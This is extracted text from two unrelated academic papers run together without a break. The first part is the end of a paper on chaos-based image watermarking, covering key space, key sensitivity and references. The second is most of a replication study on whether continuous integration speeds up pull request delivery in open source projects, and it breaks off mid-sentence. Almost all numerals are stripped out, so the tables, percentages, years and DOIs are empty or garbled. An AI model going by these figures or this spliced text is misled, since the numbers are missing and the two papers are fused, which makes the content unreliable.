encryption scheme based on fractional order chaotic system table comparsion result of psnr values between proposed scheme and previous work psnr[db] attacks proposed scheme rawat ea al[ ] gaussian noise . . contrast enhancement . . average filtering . . median filtering . . gamma correction . . histogram equalization . . jpeg(q= ) . . . security analysis and simulation for proposed scheme ) the grey histogram analysis the histogram reflects the basic statistical characteristics of the image. compare the grey histograms of the original image and the watermarked image, the statistical performance is analyzed. fig. shows the histograms of the original image and the watermarked image. from the figure, it is clear that two histograms are almost the same. the real information of the watermark image has been well hidden, it is not easy to use statistical characteristics to attack the watermarked image. so, the proposed algorithm can well resist statistical attack. ) the space of key for an encryption scheme, key space should be enough large to resist brute-force attack. in proposed scheme, the initial key consists of many elements. so the key of the system can be set ( ) , , ,a bα γ , each key parameter is independent of each other. in practical design, a and b are impossible to be infinitely large, their range can be set , a b< < . according to the precision of the double precision floating point of the computer, the scheme takes bytes and effective numbers to analyze the data. so the key space is equivalent to × × × = , which is able to resist the brute-force attack. (a) the histogram of the original image (b) the histogram of the watermarked image figure. the grey histograms international journal of advanced network monitoring and controls volume , no. , ) key sensitivity a good encryption scheme needs not only a large key space, but also it must be sensitive to the key parameters. only in this way can it be able to resist the differential attack. in the test, the key used in the scheme is ( . , . , , ). in order to test the sensitivity of the algorithm to the key, some error keys are used to extract the watermark image. as can be clearly seen from fig. , the proposed scheme is very sensitive to the key parameters, even if a single key parameter is only . of the deviation, it will lead to a completely different extraction result. (a)extracted watermark by the (b) extracted watermark by the (c) extracted watermark by the correct key: ( . , . , , ) wrong key: ( . , . , , ) wrong key: ( . , . , , . ) figure. extraction result . conclusion through research, a new image watermarking scheme based on the fractional order chen chaotic system and discrete wavelet transform is proposed. the fractional order chen chaotic system is used to increase the overall complexity of the algorithm. chaotic system is used to deal with the digital watermarking, and the watermarking information is embedded into the original image which is processed by discrete wavelet transform. by analyzing and comparing the experimental results show that the proposed watermarking scheme has high security and stronger robustness and invisibility. all these characteristics demonstrate that the proposed scheme is in favor of image watermarking encryption. acknowledgment this work was supported by national nature science foundation of china (no: ). references [ ] s. poonkuntran, r.s. rajesh. “chaotic model based semi fragile watermarking using integer transforms for digital fundus image authentication”, multimedia tools & applications, vol. , no. ,pp. - , . [ ] x.j.tong, y.liu, m.zhang, et al. “a novel chaos-based fragile watermarking for image tampering detection and self-recovery”, signal process image commun, vol. , no. ,pp. - , . [ ] s.behnia, m.teshnehlab, p.ayubi. “multiple-watermarking scheme based on improved chaotic maps”, communications in nonlinear science & numerical simulation, vol. , no. ,pp. - , . [ ] t.g.gao, q.l.gu, s.emmanuel. “a novel image authentication scheme based on hyper-chaotic cell neural network”, chaos solitons&fractals, vol. , no. ,pp. - , . [ ] a.mooney, j.g.keating, i.pitas. “a comparative study of chaotic and white noise signals in digital watermarking”, chaos solitons&fractals, vol. , no. ,pp. - , . [ ] g.y.gao, g.p.jiang. “zero-bit watermarking resisting geometric attacks based on composite-chaos optimized svr model”, the journal of china universities of posts and telecommunications, vol. , no. ,pp. - , . image watermarking encryption scheme based on fractional order chaotic system [ ] s.rawat, b.raman. “a publicly verifiable lossless watermarking scheme for copyright protection and ownership assertion”, aeu-international journal of electronics and communications, vol. ,no. ,pp. - , . [ ] m.r.keyvanpour, f.m.bayat. “blind image watermarking method based on chaotic key and dynamic coefficient quantization in the dwt domain”, mathematical&computer modelling, vol. ,pp. - , . [ ] d.y.zhao, j.p.chen, j.c.sun. “design and implementation of improved watermarking system in wt domain”, the journal of china universities of posts and telecommunications, vol. ,no. ,pp. - , . [ ] m.barni, f.bartolini, a.piva. “improved wavelet-based watermarking through pixel-wise masking”, ieee transactions on image processing a publication of the ieee signal processing society, vol. ,no. ,pp. - , . [ ] b.y.lei, d.ni, s.p.chen, et al. “optimal image watermarking scheme based on chaotic map and quaternion wavelet transform”, nonlinear dynamics, vol. ,no. ,pp. - , . [ ] o.benrhouma, h.hermassi, s.belghith. “tamper detection and self-recovery scheme by dwt watermarking”, nonlinear dynamics, vol. ,no. ,pp. - , . [ ] j.song, z.zhang. “a digital watermark method based on svd in wavelet domain”, international journal of advancements in computing technology, vol. ,no. ,pp. - , . [ ] g.p.tang, x.f.liao, y.chen. “a novel method for designing s-boxes based on chaotic maps”, chaos solitons&fractals, vol. ,no. ,pp. - , . [ ] c.p.li, g.j.peng. “chaos in chen’s system with a fractional order”, chaos solitons&fractals, vol. ,no. ,pp. - , . [ ] s.m.kenneth, r.bertram. “an introduction to the fractional calculus and fractional differential equations”, wiley-interscience, vol. ,no. ,pp. - , . [ ] j.h.song, j.w.song, y.h.bao. “a blind digital watermark method based on svd and chaos”, procedia engineering, vol. ,no. ,pp. - , . [ ] t.h.chen, g.b.horng, w.b.lee. “a publicly verifiable copyright-proving scheme resistant to malicious attacks”, ieee transactions on industrial electronics, vol. ,no. ,pp. - , . [ ] w.b.pennebaker, j.l.mitchell. jpeg still image data compression standard, new york: van nostrand reinhold, . [ ] t.acharya, p.s.tsai. jpeg standard for image compression: concepts, algorithms and vlsi architectures,new york: john wiley & sons, . [ ] r.c.gonzalez, r.e.woods. digital image processing, new york: addison-wesley longman publishing co., inc., . [ ] w.k.pratt. digital image processing,new york: wiley & sons, . [ ] a.rosenfeld a, a.c.kak. digital picture processing,cambridge, massachusetts: academic press, . author brief and sponsors: dawei ding, he is an associate professor with school of electronics and information engineering at anhui university, hefei, china. his research area include communications networks, the nonlinear circuit network, the network congestion control, non- linear dynamics and chaos, bifurcation, etc.. submitted august accepted november published december corresponding author philipp leitner, philipp.leitner@chalmers.se academic editor arie van deursen additional information and declarations can be found on page doi . /peerj-cs. copyright guo and leitner distributed under creative commons cc-by . open access studying the impact of ci on pull request delivery time in open source projects—a conceptual replication yunfang guo and philipp leitner software engineering division, chalmers | university of gothenburg, gothenburg, sweden abstract nowadays, continuous integration (ci) is indispensable in the software development process. a central promise of adopting ci is that new features or bug fixes can be delivered more quickly. a recent repository mining study by bernardo, da costa & kulesza ( ) found that only about half of the investigated open source projects actually deliver pull requests (pr) faster after adopting ci, with small effect sizes. however, there are some concerns regarding the methodology used by bernardo et al., which may potentially limit the trustworthiness of this finding. particularly, they do not explicitly control for normal changes in the pull request delivery time during a project’s lifetime (independently of ci introduction). hence, in our work, we conduct a conceptual replication of this study. in a first step, we replicate their study results using the same subjects and methodology. in a second step, we address the same core research question using an adapted methodology. we use a different statistical method (regression discontinuity design, rdd) that is more robust towards the confounding factor of projects potentially getting faster in delivering prs over time naturally, and we introduce a control group of comparable projects that never applied ci. finally, we also evaluate the generalizability of the original findings on a set of new open source projects sampled using the same methodology. we find that the results of the study by bernardo et al. largely hold in our replication. using rdd, we do not find robust evidence of projects getting faster at delivering prs without ci, and we similarly do not see a speed-up in our control group that never introduced ci. further, results obtained from a newly mined set of projects are comparable to the original findings. in conclusion, we consider the replication successful. subjects software engineering keywords continuous integration, mining software repositories, replication, pull-request based development introduction continuous integration (ci) is by now a popular practice in the software commu- nity (duvall, matyas & glover, ). ci helps developers integrate changes frequently in a collaborative manner. as a distributed and cooperative practice, ci is commonly used in both, commercial and open source software (oss) development. considerable previous research has investigated the impact of ci on oss projects. vasilescu et al. ( ) found that core developers are able to discover more bugs using ci. ståhl & bosch ( ) claim that integrators tend to release more frequently after adopting ci. finally, a recent study how to cite this article guo y, leitner p. . studying the impact of ci on pull request delivery time in open source projects—a con- ceptual replication. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:philipp.leitner@chalmers.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. by bernardo, da costa & kulesza ( ) empirically analyzed whether ci improves the time-to-delivery of merged pull requests (prs) that are submitted to github projects. interestingly, this study revealed that only . % of the analyzed oss projects actually deliver merged prs more quickly after adopting ci. the authors present an increase in pr submission numbers after adopting ci as a possible reason for this relatively counter- intuitive result. further, the authors used regression analysis to identify two factors (merge workload and queue rank) that are the main predictors of pr delivery time. however, we observe that the study by bernardo et al. exhibits some important limitations. firstly, their methodology consists of comparing various pr related metrics before and after ci adoption without controlling for confounding factors, most importantly that pr delivery time may increase or decrease naturally over the lifetime of a project. for example, it is conceivable that projects may just naturally get better at merging prs over time, independently of whether they adopt ci or not. secondly, they do not make use of a control group of projects that never adopted ci in the first place. in our opinion, this limits the trustworthiness of the results of bernardo et al. hence, in our work, we present a conceptual replication (shull et al., ) of this study. we replicate their work and investigate the same research questions with slightly different methodology, and by incorporating additional study objects. concretely, we investigate the following research questions. rq : exact replication. can the original study results be reproduced? as a baseline, we reproduce the original results of the study, using the same methodology and the data provided by the authors. we are able to achieve very similar results, with minor differences (between . and . percentage points difference to the originally published results). rq : conceptual replication. to extend the original study methodology, and address the concerns we have with the experimental methodology as initially proposed, we investigate two different aspects: rq . : can similar results to the original study be found when controlling for changes in pr delivery time over the lifetime of a project? to answer this question, we apply regression discontinuity design –rdd (thistlethwaite & campbell, ), a statistical method that allowed us to evaluate whether there is a trend of pr delivery times over time, and whether this trend changes significantly when ci is introduced. we find no clear evidence of such trends in the data, alleviating our concerns in this regard. however, we observe that pr delivery times depend strongly on when in the release cycle a pr is merged. prs that are merged close to the next release are released much quicker than prs that come in shortly after a release. this indicates that, ultimately, ci introduction may have less impact on pr delivery times than how often a project releases. rq . : are there other factors besides merge workload and queue rank that strongly impact the pr delivery time? based on the results of rq . , we hypothesize that one important factor impacting pr delivery time that is not directly captured in the original study is when in the release cycle a new pr is submitted. we incorporate this additional variable into the regression model, and evaluate whether it is a better predictor than the variables in the guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. original study. we find that this ‘‘come-in time’’ indeed is the best predictor of pr delivery time for a majority of projects. rq : generalizability. finally, to evaluate the generalizability of the results, we apply our adapted methodology to two new data sets, a new data set of study subjects collected using the same methodology as in the original study, and a control group of projects that have similar characteristics but have, to the best of our knowledge, never applied ci. rq . : can similar results be found when applying the same methodology to different projects that have also adopted ci? we find that results found for a new set of study subjects vary up to percentage points. however, the high-level conclusions drawn by the original study still hold for our replication using new data. hence, we consider the original findings to be largely confirmed using additional data, with the caveat that the individual differences between projects may be very high. rq . : can similar results be found when applying the same methodology to different projects that have never adopted ci? finally, we collect a control group of comparable projects that have never adopted ci. we observe results that vary between and percentage points from what has been observed based in the original data, i.e., the results of applying the same methods on a control group are only mildly more different than applying the same method on a new test group (rq . ). however, we observe that projects in the control group do not increase the number of prs they are able to handle per release over time. this is different to both test groups, where we observe a statistically significant increase in submitted, merged, and released prs per release after ci adoption. in summary, we consider the replication successful. our concern regarding trends in the data has largely been alleviated, and an analysis of a control group has led to, at least subtly, different results. however, our results also indicate that pr delivery times seem to more strongly depend on when in the release cycle a pr comes in than on whether or not a ci system is present. this is consistent with the original study, which also reported that the presence of ci only impacts delivery time metrics with small effect sizes. our study sheds some more light on why this is the case. finally, we conclude that the delivery time of prs is not strongly impacted by whether a project adopts ci, but projects that do are able to handle more prs per release than projects that do not. the present article is based on work conducted by the first author over five months in early as part of her master’s thesis project at chalmers university of technology, under the supervision of the second author (guo, ). the results presented here are a summary of this work, and more details can be found in the thesis report. background we now present important background on ci and the pull request based development model. further, we summarize the main results of bernardo, da costa & kulesza ( ), which we attempt to replicate in our study. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ci and the pull request based development model ci is a practice which has originated from agile software development and extreme programming. its core tenet is the merging of all developer working copies to shared mainline several times a day. each integration is then verified by an automated build, which allows errors to be detected and located as early as possible (see also online https://www.thoughtworks.com/continuous-integration). ci promises manifold benefits, such as quickening the delivery of new functionalities (laukkanen, paasivaara & arvonen, ), reducing problems of code integration in a collaborative environment (vasilescu et al., ), hence guaranteeing the stability of the code in the mainline. consequently, ci has found widespread practitioner adoption (hilton et al., ), making it a relevant subject of academic study. tightly linked to ci (and to the github open source development platform— https://github.com) is the idea of pull request based development (see also fig. for a schematic overview). in this model, the main repository is not shared with external developers. instead, prospective contributors fork the central repository and clone it to a local repository. the contributor makes changes to the local repository, and commits their changes there. these local changes are then submitted to the main repository by opening a pr in the central repository. a ci system, such as travis-ci (https://travis-ci.com), then automatically merges the pr into a test branch and runs the tests to check if the pr breaks the build. finally, one or more rounds of code review (bacchelli & bird, ; mcintosh et al., ) are conducted and the integrator decides whether to approve the pr, after which it is merged and closed. does using ci lead to faster pull request delivery? note that a ci system is not strictly required for the pull request based development model to be followed. bernardo, da costa & kulesza ( ) have studied whether using a ci system, which, as described, automates much of the testing that integrators otherwise would have to do manually, leads to shorter pr delivery times. they collected , prs and , releases of oss projects using the github api, and addressed the following three research questions: rq : are merged pull requests released more quickly using ci? rq : does the increased development activity after adopting ci increase the delivery time of prs? rq : what factors impact the delivery time after adopting ci? by applying non-parametric tests to the merge and delivery time of prs, the authors drew the conclusion for rq that only half of the projects deliver prs faster after adopting ci, but . % of the studied projects merge prs faster before using ci. in rq , they found that there is a considerable increase in the pr submission, merge and delivery rate, concluding that this may be the reason why projects do not deliver merged prs faster after adopting ci. they also found that the number of releases per year does not change significantly after ci adoption. in rq , they built linear regression models for each project and used the wald x maximum likelihood test to evaluate the explanatory power of a number of different factors. they found that the two variables with the highest explanatory guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.thoughtworks.com/continuous-integration https://github.com https://travis-ci.com http://dx.doi.org/ . /peerj-cs. figure an overview of the pull request based development model. full-size doi: . /peerjcs. /fig- power were both related to the volume of prs that have to be merged, namely the merge workload (how many prs are waiting to be merged?) and queue rank (is the pr at the beginning or the end of the merge queue?). related work we now discuss previous work in related fields and how the research questions in the study fill in gaps presented in the field. ci adoption and pull requests previous researchers have investigated the impact of adopting ci in projects in multiple aspects. most papers agreed that the introduction of ci is beneficial to projects. manglaviti et al. ( ) examined the human resources that are associated with developing and maintaining ci systems. they analyzed , github repositories that adopt travis-ci using quantitative methods. the authors found that for projects with growing contributor bases, adopting ci becomes increasingly beneficial and sustainable as the projects age. further, there is a strong expectation that ci should improve the productivity of projects. miller ( ) analyzed the impact of ci by summarizing their experience with ci in a distributed team environment at microsoft in . they collected various ci related data in their daily work. teams moving to a ci driven process can expect to achieve at least a % reduction in check-in overhead when compared to a check-in process that maintains the same level of the code base and product quality. ståhl & bosch ( ) argued based on survey results that build and test automation saves programmer’s time for more creative work, and should thus increase productivity. stolberg ( ) argued that ci practices speed up the delivery of software by decreasing integration times. however, not all previous study agree that adopting ci improves productivity. for instance, parsons, ryu & lal ( ) found no clear benefits of ci on either productivity or quality. related research has shown that the pr based development model is popular in oss projects. for instance, vasilescu et al. ( ) collected github projects and found guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. that for of project ( %), builds corresponding to prs are much more likely to succeed than builds corresponding to direct pushes. gousios, pinzger & van deursen ( ) found that % of repositories are using prs on github. they selected projects from the ghtorrent corpus, and concluded that the pr model offers fast turnaround, increased opportunities for community engagement, and decreased time to incorporate contributions. ci impact on pull request success and release frequency our study focuses on whether ci has an impact on pr delivery time. bernardo, da costa & kulesza ( ) have conducted an extensive mining study on this subject (as discussed in more detail in ‘does using ci lead to faster pull request delivery?’). our present work is a conceptual replication of their paper. hilton et al. ( ) have previously analyzed , open source projects from github and surveyed developers. the authors found that ci helps projects release twice as often and that when using ci, prs are accepted . hours sooner in median. vasilescu et al. ( ) studied the usage of travis-ci in a sample of github projects written in ruby, python, and java. they found that the majority of projects ( . %) are configured to use travis-ci, but less than half actually use it. in follow-up research, they investigated the productivity and quality of github projects that use ci (vasilescu et al., ). they found that projects that use ci successfully process, accept, and merge more prs. this increased productivity does not appear to be gained at the expense of quality. finally, yu et al. ( ) collected , prs from different github projects. they investigated which factors affect pr evaluation latency in github by applying a linear regression model and quantitative analysis. they found that the size of pr and the availability of the ci pipeline are strong predictors or pr delivery time. in later work, the same authors used a linear regression model to analyze which factors affect the process of the pull request based development model in the context of ci (yu et al., ). they found that the likelihood of rejection of a pr increases by . % when the pr breaks the build. the results also show that the more succinct a pr is, the greater the probability that such a pr is reviewed and merged quickly. replication studies the need for conducting more replications of published research is by now rather widely accepted in the software engineering community, as documented through efforts such as the rose festival (held, for instance, at icse (https:// .icse-conferences.org/track/icse- -rose-festival) and fse (https://github.com/researchart/rose -fse ) in ). in general, replication is necessary to increase the trust in any individual piece of research –the results of any one study alone cannot be extrapolated to all environments, as there are typically many uncontrollable sources of variation between different environments (shull et al., ). successful replication increases the validity and reliability of the outcomes observed in an experiment (juristo & gmez, ). shull et al. ( ) distinguish two types of replication studies. in exact replications, the original experimental design is followed as exactly as possible, while a conceptual replication attempts to answer the same research questions using an adapted methodology. we argue that conceptual replications are even guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https:// .icse-conferences.org/track/icse- -rose-festival https:// .icse-conferences.org/track/icse- -rose-festival https://github.com/researchart/rose -fse http://dx.doi.org/ . /peerj-cs. more important than exact ones, as they allow us to control for deficiencies in research design, whereas exact replications mostly validate experiment execution. however, not all researchers share this excitement about replication studies. shepperd ( ) argued that, due to wide prediction intervals, most replications end up successful anyway. further, according to basili, shull & lanubile ( ), replication studies in software engineering are particularly difficult to conduct, as experiments in this field usually involve a large number of context variables. consequently, a systematic mapping study of replications in the software engineering field (shull et al., ) concluded that the absolute number of replications is still small, in particular considering the breadth of topics in software engineering. their study retrieved more than , articles, from which they selected articles reporting only replications. our work is a contribution towards increasing the trustworthiness of research on the impact of ci on pr delivery times. our replication design combines exact with conceptual replication—we decide to not deviate far from the original design of bernardo, da costa & kulesza ( ), and also largely follow their style of presentation, while at the same time addressing the methodological concerns we had with their original work. method the goal of the present study is to replicate and extend the results from earlier work presented in ‘does using ci lead to faster pull request delivery?’. we now discuss our scientific methodology and the data that has been used. fig. provides a schematic overview. for rq , rq . , and rq . , the data set from the original study is re-used. for rq . and rq . , two new data sets are collected from github. for rq , the original statistical methods are re-used. for rq . , an alternative analysis approach (rdd) is employed. for rq . , the same method is extended with an additional analysis variable (the point in time in the release cycle when a pr is submitted, ‘‘come-in time’’). for rq . , all analyses are applied to the new data sets. for rq . , we only apply non-parametric tests, as our findings do not warrant applying the rest of the analyses to this data set. all data as well as the necessary analysis scripts are publicly available on github https://github.com/radialine/do- open-source-projects-deliver-pull-requests-faster-using-ci. study subjects and data collection as depicted in fig. , our study relies on three different sets of study objects –the original data provided by the authors, a set of new projects collected using the same methodology (new data), and a control group consisting of projects collected using the same methodology, but which, crucially, have to the best of our knowledge never adopted ci (control data). basic information about the three data sets is contained in table . the collection procedure is further described below. original data we re-use the data that bernardo, da costa & kulesza ( ) have made available online https://prdeliverydelay.github.io/#datasets. however, for a subset of our analysis, we need guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci https://prdeliverydelay.github.io/#datasets http://dx.doi.org/ . /peerj-cs. original new control rq rq . rq . rq . rq . rq results non-parametric test rq . results rdd rq . results linear regression rq . results rq . results all three methods original paper results compare non-parametric test figure overview of study methodology and used data. shaded elements are re-used from bernardo, da costa & kulesza ( ). full-size doi: . /peerjcs. /fig- additional information not contained in the original data (e.g., the exact point in time when a pr was merged). this information was collected directly through the github api. new data for collecting a new data set, we largely follow the process originally used by bernardo, da costa & kulesza ( ), which in turn was inspired by vasilescu et al. ( ). we identify the most highly-starred projects on github written in java, python, php, ruby, and javascript. this leads to a total of unique projects (projects that use multiple of these languages are counted only once). we discard all projects that are not using travis-ci, as well as all projects that were already contained in the original data set. we further exclude all projects that have less than merged prs before or after ci adoption. that is, we only consider projects that have had reasonable development activity before and after adopting ci. finally, we also discard toy projects, tutorials, and other similar projects that are not intended to be deployed to production. this leaves us with projects, for which we then collect pr and release data using git and the github api. control data we use the same process as for new data to collect a control group, with the key difference that we discard all projects for which we can tell that they are, or have been, using any ci system, leading to projects. note that this data set is smaller, as, given the prevalence of ci, it is difficult to find high-profile projects with similar characteristics to the projects in the other two data sets which never adopted ci in their lifetime. analysis methods as shown in fig. , we use three different statistical methods in our study. we replicate two of the methods used in the original study, and introduce a third, new, method (regression discontinuity design, rdd). guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table basic data set statistics. data set # of projects total # of prs original data . new data . control data . methods re-used from the original study in line with the original work, we use non-parametric hypothesis testing (mann-whitney- wilcoxon, mww) for testing whether there is a statistically significant difference in pull request delivery time before and after ci introduction. mww is used as data normality could not be assumed. mww is used in conjunction with cliffs delta to measure effect sizes, using the standard threshold values as defined by romano et al. ( ). additionally, we use a multiple regression model fitted with ordinary least squares to identify which factors best explain a dependent variable (delivery delay, in our case). we use the wald x maximum likelihood test to evaluate the explanatory power of each independent variable. rdd due to our concern that the original study did not properly control for changes in pr submissions and pr delivery time that are independent of ci (due to, for instance, project growth or other project lifetime related factors), we extend the original work with an additional statistical method, rdd, as inspired by the work of zhao et al. ( ). rdd is a fairly old idea firstly proposed by thistlethwaite & campbell ( ), which is seeing a renaissance in recent years (imbens & lemieux, ). it is a quasi-experimental pretest- posttest design that elicits the causal effects of interventions by assigning a cutoff above or below when an intervention is applied (ci introduction, in our case). the assumption of rdd is that the trend continues without changes if the intervention does not exist. we would conclude that ci had a significant impact if there is an obvious discontinuity around the cutoff point (the point in time when the intervention has been applied). a core question when applying rdd is which model(s) to use for fitting the data before and after the intervention. in this study, four models of rdd are used, as sketched in fig. . the linear model with common slope assumes that the data before and after the intervention can be fit using the same linear regression model (shifted by a constant), while the linear model with different slopes only assumes that both sides can be fit by any linear regression. the non-linear model assumes that at least one side requires fitting using a non-linear regression. finally, local linear regression performs exactly that using the imbens-kalyanaraman optimal bandwidth calculation. results we now discuss the results for each research question. given that this is a replication study, a particular emphasis will be put on comparing our results to bernardo, da costa & kulesza ( ) and evaluating to what extent the results therein still hold. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure rdd estimation models. full-size doi: . /peerjcs. /fig- pr submitted pr merged pr released md (merge delay) dd (delivery delay) pl (pull request lifetime) figure graphical overview of the evaluated metrics dd, md, and pl. adapted from bernardo, da costa & kulesza ( ). full-size doi: . /peerjcs. /fig- rq –exact replication as a first step in the study, we conducted an exact replication of bernardo, da costa & kulesza ( ), based on the data that the authors provide. this was deemed necessary as a first step of validation, but also to acquire the necessary in-depth knowledge about the original study’s design choices. rq of the original study investigated the impact of adopting ci on the delivery time of prs. they analyzed three metrics, which are delivery delay (dd, days between when a pr got merged and when it was released), merge delay (md, days between when a pr was submitted and when it was merged), and pull request lifetime (pl). a visual overview of these metrics and what they mean in the pr lifecycle is presented in fig. . guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table results of the exact replication of rq in bernardo, da costa & kulesza ( ). faster with ci [% of projects] stat. different [% of projects] dd original . % . % replication . % . % difference . . md original % . % replication . % . % difference . . pl original . % . % replication . % . % difference . after carefully studying the original paper and limited follow-up discussion with the authors through private communications, we are able to reproduce their results. table contrasts the original results with the results of our exact replication. we report on the percentage of projects for which each of these metrics improved after introducing ci (i.e., handling prs became faster) and the percentage of projects for which there is a statistically significant difference (in any direction). cliff’s delta effect sizes for the latter metric vary between . and . (i.e., a small effect size), except for the changes in pull request liftetime, where we observe medium or even large effect sizes for a majority of projects. it is interesting to note that even though we used the same methods on the same data, we were not able to achieve entirely identical results (differences between . and . percentage points). we speculate that the observed differences may be due to undocumented data cleaning procedures or updates to the publicly available data set. however, given that the main findings of the study remain unchanged, we nonetheless consider the replication successful. rq in the original study then tried to find the reason for this phenomenon. the authors compare the number of submitted, merged, and released prs before and after ci adoption. we again replicate this analysis, leading to the results depicted in fig. . for this analysis step, our results are virtually identical to what has been presented in bernardo, da costa & kulesza ( ). we observe that after ci was adopted, thenumber of submitted, merged and released prs per release increases statistically significantly with medium effect sizes. interestingly, the release frequency does not change statistically significantly after adopting ci. box . summary and lessons learned. we were able to conduct an exact replication of the original paper, with minor dif- ferences in the results (between . and . percentage points). all main results of the original study are confirmed. this analysis indeed supports that only about half the projects deliver prs faster (with a small effect size) after introducing ci, but less than a third of projects improves how fast they merge prs (again with a small effect size). while projects do not seem to release more frequently, they can handle more prs per release after ci adoption. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of merged and released prs per release before (‘‘no-ci’’) and after (‘‘ci’’) in- troduction of ci. full-size doi: . /peerjcs. /fig- rq –conceptual replication we now discuss the two additional analysis steps we have introduced in our study in comparison to the original work. application of rdd (rq . ) in the first step of our conceptual replication, we use rdd to analyze whether there are gradual changes in pr delivery time over the lifetime of projects, independently of ci introduction. however, an initial visual inspection of both, dd and pl, reveals that these metrics follow a clear pattern that is independent of ci introduction. figures and depict this for two example projects (mantl/mantl and mozilla-b g/gaia). virtually all projects in the original data set follow a similar pattern, indicating that these metrics are to a large degree dominated by when in the release cycle a pr comes in –prs merged shortly after a release need to wait for the next release to roll around, while prs merged shortly before a release get released much quicker. it is unlikely that the introduction of ci has much direct impact on this. it should be noted that this is true even for pl, which represents the entire delivery time of a pr (i.e., the time it takes maintainers to merge a pr plus the time the pr then waits to get released). hence, it seems unlikely that the introduction of ci can impact this end-to-end delivery time of a pr by much. this also explains why we, similar to the original study, observe primarily differences with small effect sizes in rq . ultimately, the end-to-end delivery time is presumably much guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure visual inspection of metric delivery delay (dd) for two example projects. (a) mantl/mantl, (b) mozilla-b g/gaia. the x-axis represents project lifetime in weeks, with point being the rdd cutoff point (i.e., the time when ci has been adopted in the project). full-size doi: . /peerjcs. /fig- figure visual inspection of metric pull request lifetime (pl) for two example projects. (a) mantl/- mantl, (b) mozilla-b g/gaia. the x-axis represents project lifetime in weeks, with point being the rdd cutoff point (i.e., the time when ci has been adopted in the project). full-size doi: . /peerjcs. /fig- more dependent on how frequently a project releases than on whether a ci system is used, which we have established in rq to not be impacted by ci adoption. however, no such pattern exists for the third metric, md. hence, we attempt to apply all four rdd models described in ‘analysis methods’. the data of each project is divided into two buckets separated by the cutoff point (when ci was adopted), and one model for each bucket is fit. fig. shows the fitted models of project boto/boto. in the first three models, the red and blue lines fit data after and before the intervention respectively. it is evident that neither the two linear models (figs. a and b) provide sufficient fit to accurately represent the data for boto/boto. indeed, the linear or non-linear models never achieve an r value higher than . for any of the projects. the local linear regression model depicted in fig. d provides a better, albeit still very noisy, fit to the data. hence, we conclude that there is no, or at least no particularly relevant, ‘‘natural trend’’ of md getting faster or slower over time in any of the projects. hence, we consider our original concern with the work of bernardo, da costa & kulesza ( ) (that projects may just naturally get faster or slower over time) to be unsupported. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure four rdd models fit for project boto/boto. (a) linear model (common slope). (b) linear model (diff slopes). (c) non-linear model. (d) local linear regression model. the x-axis represents project lifetime in weeks, with point being the rdd cutoff point (i.e., the time when ci has been adopted in the project). full-size doi: . /peerjcs. /fig- evaluation of “come-in time” as predictor of pr delivery time (rq . ) in an attempt to explain what exactly impacts the end-to-end lifetime of a pr (pl), the original study built a multiple regression model based on different variables (related to characteristics of the project, the pr submitter, and the pr itself). they found that three metrics (merge workload, queue rank, and, to a lesser degree, the contributor) had significant explanatory power with regards to pl. before ci adoption, the merge workload has the highest explanatory power, which changes to the queue rank after adoption. based on our previous findings, we speculate that in fact the most important predictor of end-to-end pr delivery time may be when in the release cycle a pr has been merged. we refer to this new factor as ‘‘come-in time’’, and provide a schematic overview of its definition in fig. . we re-use the original methodological setup (regression analysis using ordinary least squares), but use the variables sketched in table . we remove all variables which had an explanatory power close to in the original study, leaving us with potential factors guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure definition of the factor ‘‘come-in time’’. full-size doi: . /peerjcs. /fig- table description of all variables used in the regression model. the first variables are re-used from bernardo, da costa & kulesza ( ), the last variable has been newly introduced in our study. variable definition variables from original study number of activities an activity is an action to a pr conducted by a github user, e.g., labeled, assigned, etc. it is assumed that a large number of activities may lead to longer delivery times. merge time the time between when a pr was created and when it was merged by an integrator (md). contributor experience the number of released prs that were created by the same author. we speculate that contributions by an experienced contributor may be evaluated less critically, and hence may be delivered faster. contributor integration the mean delivery time in days of the past prs submitted by this contributor. if past prs were released quickly, then the next pr submitted by the same person may also be released rapidly. merge workload the number of prs waiting to be merged at the time when the pr was submitted. we speculate that, as the time and energy of integrators is limited, the workload of an integrator may have an impact on delivery times. queue rank this variable represents the order of the merged prs in a release cycle. a merged pr might be released faster or slower depending of its position in the merge queue. new variable come-in time the time in days between the time when a pr got merged and the time of the last release (see also figure ??). this new variable is motivated by our previous findings. of influence (‘‘merge workload’’, ‘‘queue rank’’, ‘‘contributor experience’’, ‘‘contributor integration’’, ‘‘number of activities’’, and ‘‘merge time’’). we add the new variable ‘‘come-in time’’ to this set. from these variables, we build two regression models for each project (before and after ci adoption), and evaluate the r metric for each model. r represents how much of the variability in the data can be explained using the model. following 